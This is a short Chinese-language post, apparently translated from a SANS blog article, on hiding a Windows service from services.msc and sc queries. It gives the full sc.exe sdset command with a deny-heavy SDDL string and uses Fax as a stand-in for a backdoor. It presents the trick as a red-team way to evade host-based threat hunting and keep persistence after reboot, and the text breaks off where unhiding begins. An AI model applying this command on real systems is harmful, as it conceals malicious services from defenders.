红队策略：隐藏Windows服务

from:https://www.sans.org/blog/red-team-tactics-hiding-windows-services/Windows的一个功能允许红队或攻击者将服务隐藏起来，从而为逃避基于主机的常见威胁搜寻技术的检测提供了机会。这里假设Fax服务是我们的恶意文件或后门打开services.msc可以看到服务执行命令可以看到服务管理员权限下执行以下命令，安全标识符定义语言(SDDL)& $env:SystemRoot\System32\sc.exe sdset Fax "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"可以看到服务视图中已经查询不到了在红队或渗透测试中，这可能是一种有用的技术，可以在受感染主机上保持持久性。重启后，隐藏的服务也会自动启动。取消隐 ………………………………